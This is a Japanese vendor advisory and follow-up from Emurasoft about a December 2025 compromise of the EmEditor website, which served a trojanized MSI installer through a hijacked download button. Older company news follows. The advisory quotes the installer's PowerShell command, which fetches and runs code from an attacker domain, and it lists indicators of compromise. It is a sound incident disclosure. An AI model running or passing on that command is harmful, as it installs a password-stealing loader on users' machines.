投稿

Emurasoft logo

【重要】EmEditor インストーラーのダウンロード導線に関するセキュリティ インシデントのお知らせ(続報)

平素より EmEditor をご利用いただき、誠にありがとうございます。
すでにお知らせしております「【重要】EmEditor インストーラーのダウンロード導線に関するセキュリティ インシデントのお知らせ」 につきまして、その後の調査で判明した事項、および前回告知の補足を以下にご報告いたします。

本件により、お客様には多大なるご心配とご迷惑をお掛けしておりますことを、重ねて深くお詫び申し上げます。


1. 影響が発生した可能性のある期間(日本時間/UTC)

前回のお知らせでは日本時間(JST)でご案内いたしましたが、補足として世界標準時(UTC)も併記いたします。

  • 2025年12月20日 11:39 〜 2025年12月23日 05:50(日本時間)
  • 2025-12-20 02:39 – 2025-12-22 20:50(UTC)

上記期間中に、EmEditor ホームページ上のダウンロード導線(例:「今すぐダウンロード」ボタン等)からインストーラーを入手された場合、弊社(Emurasoft, Inc.)が提供する正規ファイルではない別ファイルがダウンロードされた可能性があります。
なお、この期間は安全側に見積もって広めに設定しており、実際にはこれよりも短い、特定の時間帯のみであった可能性もあります。


2. 問題のファイルについて(確認できている差分)

本件で問題となっているファイル emed64_25.4.3.msi について、少なくとも 2つの「問題のあるファイル」 が存在することを確認しています。

また、問題のあるファイルに付与されていた電子署名(デジタル署名)は、いずれも Microsoft から発行された署名でした。署名の有効期間が数日間と非常に短いことから、いわゆる開発者向けに近い形で発行された署名である可能性が高いと考えています。
弊社では、Microsoft に対して問題のファイルを添付して本インシデントを報告し、当該デジタル署名の無効化を要求いたしました。現在では、これら両方のデジタル署名がすでに無効化されていることを確認しており、当該 MSI を実行しようとすると、デジタル署名が無効である旨の警告メッセージが表示され、容易にはインストールできない状態になっています。

正しいファイル(弊社正規 EmEditor インストーラー)

問題のあるファイル その1

問題のあるファイル その2


3. ダウンロードしたファイルを既に削除してしまった場合の対処方法

ダウンロードしたファイル(emed64_25.4.3.msi)が手元に残っている場合は、前回もお知らせしましたとおり、デジタル署名または SHA-256 により確認できます。

一方で、すでにダウンロードしたファイルを削除してしまっている場合でも、Windows の仕様により、インストール時に参照された MSI が C:\Windows\Installer 配下に別名で残っていることがあります。

このフォルダは「隠しフォルダ」であると同時に、OS により保護されたフォルダでもあるため、ファイル エクスプローラー上で通常の操作だけでは見つけにくく、C:\Windows\Installer をパス指定して直接開く必要があります。

フォルダを開いた後は、以下の流れを推奨いたします。なお、この際、MSI ファイルをダブルクリックしたり実行したりしないよう、細心の注意を払ってください。

  1. 日付順(更新日時など)で並べ替えを行う
  2. 比較的新しいファイルを中心に確認する
  3. 対象ファイルの 電子署名(デジタル署名) を確認する(右クリック → プロパティ → デジタル署名)

4. コンピューターがマルウェアに感染したかどうかを判別する方法

問題のファイルを実行したとしても、次のような環境では必ずしも感染するとは限りません。

  • 端末がオフラインであった場合
  • VPN/プロキシ必須環境であった場合
  • Windows の機能/ポリシーにより PowerShell の不審な挙動がブロックされた場合
  • PowerShell の起動自体が制限されていた場合
  • アンチウイルス/セキュリティ ソフトウェアによりブロックされた場合

次のような条件が 1 つでも当てはまる場合、感染している可能性が非常に高くなります。

  • C:\ProgramData\tmp_mojo.log というファイルが存在する
  • Google Drive Caching という名前のタスクがスケジュールされている
  • %LOCALAPPDATA%\Google Drive Caching\ フォルダ内に background.vbs が存在する
  • Chrome、Microsoft Edge など Chromium ベースのブラウザに、Google Drive Caching という名前のブラウザ拡張機能が存在する(たとえ Google 製を名乗っていても)。特に、「すべてのウェブサイト上のデータの読み取りと変更」が可能で、さらにクリップボードにアクセスできる権限を持つ場合
  • ネットワーク ログを調べて、次のいずれかに接続された形跡がある: cachingdrive.comemeditorde.comemeditorgb.comemeditorjp.comemeditorsb.com

以上のすべての項目に当てはまらない場合、リスクは低くなりますが、ゼロではありません。攻撃の一部はファイルに痕跡を残さず、メモリ内で行われるためです。


5. 確認されている挙動(アクセス先ドメイン等)

前回お知らせしたとおり、問題のインストーラーは、実行時に 外部ドメインからファイルを取得して実行する挙動を示すことが分かっています。前回の告知では emeditorjp.com へのアクセスを確認していましたが、その後の調査により、emeditorjp.com だけでなく emeditorde.comemeditorgb.comemeditorsb.com にもアクセスしていることが分かりました。

これら 4 つのドメイン(emeditorjp.comemeditorde.comemeditorgb.comemeditorsb.com)は、いずれも弊社(Emurasoft, Inc.)が管理しているドメインではありません。

また、前回お知らせした PowerShell コマンドは外部ドメインからファイルを取得して実行するものであり、これにより、インストーラーを実行したコンピューターがマルウェアに感染し、パスワード等の個人情報が窃取される可能性があることを確認しています。

詳細については、Luca Palermo 氏および Mario Ciccarelli 氏によりまとめられた研究レポートをご参照ください。本レポートは Luca Palermo 氏からご提供いただいたものであり、掲載の許可もいただいております。この場を借りて、ご厚意に感謝申し上げます。


6. 問題の本質(なぜ「見分けにくい」のか)

まず前提として、ドメインデジタル署名は、一定の条件を満たせば第三者でも取得できてしまう、という現実があります。

  • ドメインは、未使用・未更新等で残っていれば、誰でも比較的安価に購入できる可能性があります。
  • デジタル署名(コードサイニング証明書)は、今回は発行者が Microsoft でしたが、一般に多くの認証局で取得が可能です。
  • 問題が発覚した後にできることは、基本的に「認証局等へ連絡し、当該署名の無効化を依頼する」ことに限られます。

さらに技術的な側面として、MSI インストーラーはカスタム アクション機能を利用することで、任意の PowerShell スクリプト等を含めることができてしまいます。したがって、ある程度の知識があれば、今回のように「流通しているインストーラーに似せたもの」に マルウェア ローダーを混入させることが可能です。
また、MSI ではなく EXE の実行型インストーラーであったとしても、PowerShell スクリプト等を含めること自体は容易であり、同様の攻撃が成立し得ます。

つまり、残念ながら、私どもソフトウェア会社にとって 「正規インストーラーに酷似した悪意のあるインストーラーの作成・流通そのもの」を完全に防ぐことは困難です。
不本意ながら、今後も非常に複雑かつ精巧な多段階型の PowerShell マルウェア ローダーを含むインストーラーが作成され得る、という点は現実として認識せざるを得ません。

その上で、今回の「本質的な問題」は大きく 2 点です。

  1. 私どもの Web サイトで利用されていた、ダウンロードに便利な リダイレクト(導線) が、気付かないうちに改変されてしまったこと
  2. 私どもの Web サイトに外部からアクセスされ、マルウェアを含む 問題のファイルが設置されてしまったこと

これらが重なったことで、「公式サイトからダウンロードしたお客様が被害に遭われた」という点に、私どもとして重い責任を感じております。防げなかったのか、という反省も含め、以後の対策に繋げてまいります。

6-1. EmEditor ホームページにマルウェアを含む問題のファイルが置かれていた件

マルウェアを含む問題のファイル emed64_25.4.3.msi 以外に、base64.php という別ファイルが、弊社 Web サイトのプラグインのディレクトリに設置されていたことが分かっています。この base64.php の内容を解析したところ、典型的なバックドア(遠隔コード実行/RCE)であることが判明しました。

さらに、WordPress テーマ用ディレクトリに以前から含まれていた footer.php にスクリプトが追加されていました。このスクリプトは、本来の URL であった https://support.emeditor.com/ja/downloads/latest/installer/64 へのユーザーのクリックを「横取り」し、当時、問題のあるインストーラーが置かれていた https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi に遷移させるものでした。

結果として、ホームページ上の「今すぐダウンロード」ボタンを押すと、問題のファイルがダウンロードされる状態になっていたことが分かりました。
さらに悪質な点として、このスクリプトは 未ログインの一般訪問者にのみ動作するようになっており、管理者側で確認しても気付きにくい(再現しにくい)状態になっていました。そのため、私自身が確認した際にも、リダイレクトが改変されていたことにすぐ気付けませんでした。


7. 問題の原因(現時点の見立て)

原因については現在も調査中であり、結論には至っていません。しかし、可能性としては次の点が考えられます。

WordPress は、本体、プラグイン、テーマ等の複数のパーツから成り立っており、多くの開発者が提供しています。これらのパーツには脆弱性が発見されることも多く、その都度、更新が提供されます。
私どもは平素よりプラグインやテーマの更新を行っていますが、脆弱性が発見されてから長期間にわたり、開発者による更新が提供されないこともあり、脆弱性が残存してしまう場合があります。今回の攻撃は、そのような脆弱性が狙われた可能性が否定できません。
さらに、使用していた SFTP アカウントが攻撃対象となった可能性も否定できません。


8. 弊社の対応(実施済み/今後)

弊社ではまず、問題のファイル emed64_25.4.3.msi を削除いたしました。加えてファイルの変更ログを調査し、base64.php の追加および footer.php の改変を確認しました。base64.php が典型的なバックドアであることを確認したため、全サイトのスキャンを実施しました。

その後、サイトを再構築し、すべてのプラグインを再インストールするとともに、不要なプラグインは使用しない方針といたしました。さらに、社内で使用しているコンピューターのスキャン、および全 WordPress サイトならびに関連サイトのログイン パスワード変更も実施しました。

また、従来「今すぐダウンロード」ボタン等で利用していたリンクについては、リダイレクトの使用を中止し、すべて安全なファイルへの直接リンクに置き換えました。ダウンロード ページでは MSI の SHA-256 を明記するとともに、デジタル署名を確認するよう説明を追加しています。

そして、EmEditor ホームページのダウンロード導線をより強固にするため、近い将来、EmEditor のホームページを WordPress とは異なる別のカスタム/静的ホームページへ移行することも検討しております。


9. 最後に

以上のとおり、マルウェアにより改変されたインストーラーは、実行されると非常に危険な挙動を取り得ます。しかしながら、私どもには「悪意あるインストーラーの作成・配布」そのものを根本的に阻止する手段がないのが実情です。

そのため、私どもができる最大のことは、第1配布先として、弊社 Web サイトからマルウェアが入手されないよう防御し続けることであると考えています。

また、Xoops や WordPress などの人気の高い CMS(コンテンツ・マネジメント・システム)は使い勝手が良い反面、拡張性が高いがゆえに脆弱性が見つかることも多く、単にプラグインやテーマの更新だけでは脆弱性を完全に拭い切れない、と今回あらためて感じました。

不幸中の幸いにも、エムソフト カスタマー センターは攻撃を受けておらず、当社のデータベースも安全でした。お客様データベースがアクセスされた証拠は確認されていません。

本インシデントによる経験が、少しでも他のソフトウェア会社の皆様のお役に立てばという思いから、単なるご報告に留まらず、可能な限りの詳細と考察を記載いたしました。

このたびは、皆様に多大なるご迷惑とご心配をお掛けしましたことを、重ねてお詫び申し上げます。特に、感染の被害に遭われた方々にはご迷惑をお掛けしましたことを深くお詫び申し上げます。

今後とも EmEditor をよろしくお願い申し上げます。

Emurasoft logo

【重要】EmEditor インストーラーのダウンロード導線に関するセキュリティ インシデントのお知らせ

平素より EmEditor をご利用いただき、誠にありがとうございます。

誠に遺憾ながら、EmEditor 公式サイトにおけるダウンロード導線(ホームページ上の [今すぐダウンロード] ボタン)に関し、第三者による改変が疑われる事象を確認いたしました。
該当期間中に当該ボタンからダウンロードされたインストーラーが、弊社(Emurasoft, Inc.)が提供する正規ファイルではない可能性があります。

お客様には多大なるご心配とご迷惑をお掛けしておりますことを、深くお詫び申し上げます。以下の内容をご確認ください。


1. 影響が発生した可能性のある期間

  • 2025年12月20日 11:39 〜 2025年12月23日 05:50 (日本時間)

上記期間中に、EmEditor ホームページ上の [今すぐダウンロード] ボタンからインストーラーをダウンロードされた場合、弊社のデジタル署名が付与されていない別ファイルがダウンロードされた可能性があります。これは広めに見積もっており、実際には、これよりも狭い特定の期間であった可能性があります。


2. 事象の概要(原因の概要)

ホームページの [今すぐダウンロード] ボタンのリンク先は通常、次の URL です。

  • https://support.emeditor.com/ja/downloads/latest/installer/64

この URL はリダイレクト(転送)設定になっていますが、当該期間中、リダイレクト設定が第三者により改変された疑いがあり、本来とは異なる URL である下記からファイルがダウンロードされる状態となっていました。

  • https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi

当該ファイルは弊社が作成したものではなく、現在は削除済みです。

その結果、ダウンロードされたファイルには弊社の署名ではなく、WALSHAM INVESTMENTS LIMITED という別組織のデジタル署名が付与されていることを確認しています。

※本件は日本語ページに限らず、以下のような他言語ページの同種 URL も影響を受ける可能性があります。

  • https://support.emeditor.com/en/downloads/latest/installer/64 (ほか)

3. 影響が確認されているファイル

現時点で影響が確認されているのは、次のファイルのみです。

  • emed64_25.4.3.msi

正しいファイル(弊社正規)

  • ファイル名: emed64_25.4.3.msi
  • サイズ: 80,376,832 bytes
  • デジタル署名: Emurasoft, Inc.
  • SHA-256: e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

問題のあるファイル(改ざんの可能性)

  • ファイル名: emed64_25.4.3.msi
  • サイズ: 80,380,416 bytes
  • デジタル署名: WALSHAM INVESTMENTS LIMITED

4. 影響を受けないケース

以下の場合は、本件の影響を受けません

  • EmEditor の 更新チェッカー(Update Checker) から更新した場合、または EmEditor により自動更新が行われた場合
  • download.emeditor.info から直接ダウンロードされた場合
    例: https://download.emeditor.info/emed64_25.4.3.msi
  • emed64_25.4.3.msi 以外のファイル
  • ポータブル版
  • ストア アプリ版
  • winget を利用してインストール/更新した場合
  • 問題のファイルをダウンロードしていたとしても、当該ファイルを実行していない場合

5. 該当する可能性がある場合の確認方法とお願い

上記期間中に [今すぐダウンロード] からインストーラーを入手された可能性がある場合は、ダウンロードした emed64_25.4.3.msiデジタル署名および SHA-256 をご確認ください。
(可能であれば、インストール/実行の有無もあわせてご確認ください。)

5-1. デジタル署名の確認手順(Windows)

  1. 対象ファイル(emed64_25.4.3.msi)を右クリックし、[プロパティ] を開きます。
  2. [デジタル署名] タブを開きます。
  3. 署名者名(Signer / 署名者)が Emurasoft, Inc. であることを確認してください。
  • WALSHAM INVESTMENTS LIMITED となっている場合、問題のあるファイルの可能性があります。

※「デジタル署名」タブが表示されない場合、署名が付与されていない、または正しく認識できない可能性があります。その場合も、当該ファイルは実行せず削除し、後述の対応をご検討ください。

5-2. SHA-256 の確認手順(Windows / PowerShell)

PowerShell を開き、次を実行してください。

Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256

出力された SHA-256 が次と一致することをご確認ください。

  • 正規ファイルの SHA-256:
    e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

署名または SHA-256 が一致しない場合(推奨対応)

デジタル署名が Emurasoft, Inc. ではなく WALSHAM INVESTMENTS LIMITED となっている場合、または SHA-256 が一致しない場合、改ざんされたファイル(マルウェアを含む可能性のあるファイル)を入手された恐れがあります。

  • 直ちに当該コンピューターを ネットワークから切り離す(有線/無線の遮断)
  • コンピューター全体の マルウェア スキャンを実施する
  • 状況により、可能であれば OS を含む環境のリフレッシュ/再構築をご検討ください
  • 当該端末で利用・保存していた情報が漏えいしている可能性も考慮し、各種サービスの パスワード変更(必要に応じて多要素認証の有効化)をご検討ください

※企業・組織でご利用の場合は、可能な範囲で 社内のセキュリティ担当部門(CSIRT 等)への連絡も推奨いたします。


6. 現時点で確認されている挙動について

本件で問題となる可能性のあるインストーラーは、実行時に次のコマンドを実行しようとします。危険ですので、このコマンドは絶対に実行しないでください。

  • powershell.exe "irm emeditorjp.com | iex"

このコマンドは emeditorjp.com からファイルを取得して実行するものです。
emeditorjp.com は弊社が管理するドメインではありません。

また、当該インストーラーは EmEditor 本体のインストール自体は正常に進み、正規の EmEditor ファイルがインストールされるため、問題に気付きにくい可能性があります。


7. 現在の対応状況と今後のご報告

現在、事実関係の確認および影響範囲の調査を継続しております。進展があり次第、本ページ等にて速やかにご報告いたします。
弊社では本事象を厳粛に受け止め、原因究明と再発防止に向けて必要な対策を講じてまいります。

このたびは、皆様に多大なるご迷惑とご心配をお掛けしましたことを、重ねて深くお詫び申し上げます。
今後とも EmEditor をよろしくお願い申し上げます。

CIO Korea (IDG) とのソウルでのインタビュー記事が公開されました

インタビュー: 高速大容量エディタ「EmEditor」をご存知ですか?・・・40年経歴の開発者エムラ・ユタカ代表 (Google翻訳)

原文: 인터뷰 | 빠른 대용량 편집기 ‘엠에디터’를 아시나요? ··· 40년 경력의 개발자 에무라 유타카 대표

CNET Korea とのソウルでのインタビュー記事が公開されました

[インタビュー] Emurasoft 代表 江村豊「エムエディター(EmEditor)、世界最速の専門家向けソフトウェア」(Google 翻訳)

原文: [인터뷰] 에무라 유타카 에무라소프트 대표 “엠에디터(EmEditor), 세계에서 가장 빠른 전문가용 SW”

セキュリティ事故対応アワード

TECH+ EXPO for セキュリティ 2023 にて講演のお知らせ

2023年9月12日から15日に開催される TECH+ EXPO for セキュリティ 2023 にて、「EmEditorの更新機能を利用したインシデントから学んだ教訓」という題目で、江村豊が講演いたします。

詳しくは、

をご覧ください。

INTERNET Watch 編集部とのインタビュー記事が公開されました

本日、INTERNET Watch 編集部とのインタビュー記事が公開されました。

「テキストの編集」にこだわりが凝縮!定番エディタ「EmEditor」はなぜ他のエディタと違うのか?

マイナビ ニュース編集部とのインタビュー記事が公開されました。

本日、マイナビ ニュース編集部とのインタビュー記事が公開されました。

快適で高速であり続けるテキストエディター「EmEditor」の真価に迫る――Emurasoft, Inc.社長 江村 豊氏インタビュー

セキュリティ事故対応アワード

『セキュリティ事故対応アワード』で優秀賞を受賞しました

日頃より EmEditor をご利用いただき、誠にありがとうございます。

2016年2月24日、Emurasoft, Inc. は、マイナビニュース主催で開催された『セキュリティ事故対応アワード』の優秀賞を受賞致しました。

今回は、国内セキュリティ業界で貢献されている有識者5名の選考委員により、2013年1月から2015年12月の間に発生したセキュリティ インシデント100件以上を対象に、事故に関する報告内容やその後の対応を調査されたそうです。本アワードは、セキュリティ インシデントに遭遇した後、優れた対応を行った企業や組織が表彰されるものです。

また、当時について振り返るインタビューの記事が掲載されました。

さらに、アットマークIT においても、同アワードについて紹介されています。

本来、このようなインシデントは発生しない方が良かったのですが、その後の対応を評価していただいたのは、不幸中の幸いです。

皆様には大変ご迷惑をお掛けしましたことを改めてお詫びし、迅速にご対応頂きましたことに、感謝しております。

今後ともよろしくお願い申し上げます。

参考:

Emurasoft logo

64-bit ポータブル版の公開、Amazon S3 クラウドへの切り替え

日頃より EmEditor をお使いいただき、誠にありがとうございます。

本日、EmEditor v14.8.0 の公開と同時に、従来のインストーラーと 32-bit ポータブル版に加えて、64-bit ポータブル版も Zip 形式で公開いたしました。ポータブル版を含むすべての形式のインストーラーは、ダウンロード ページからダウンロードしていただけます。

さらに、ファイルのホスティングは、従来の Web ホスティング サーバーから、Amazon S3 クラウド サービスに切り替えました。これにより、より高速で安定したダウンロードと更新がご利用いただけます。

これからも、より快適に EmEditor をご利用いただけるよう、サービスの改善を続けていきたいと考えています。万一、ファイルのダウンロードまたは更新の際に問題が発生した場合には、お問い合わせよりご連絡ください。

今後もよろしくお願い申し上げます。

※INI ファイルを使用するポータブル版は、インストーラー形式に比べて、トレイアイコン、各種ショートカット、自動更新などの機能が付いておらず、またレジストリを使用するインストーラー版ほど高速に動作しないことがあります。

Emurasoft logo

サーバー保守が終了しました

日頃より、EmEditor をご利用いただき、誠にありがとうございます。

昨日より続いていたサーバーの保守は、先ほど終了いたしました。新しいホストはセキュリティ上より安全で高速になります。保守の間、一時的に本サイトへの接続が難しいことがあったことをお詫びいたします。ご協力いただき、誠にありがとうございました。

今後もよろしくお願い申し上げます。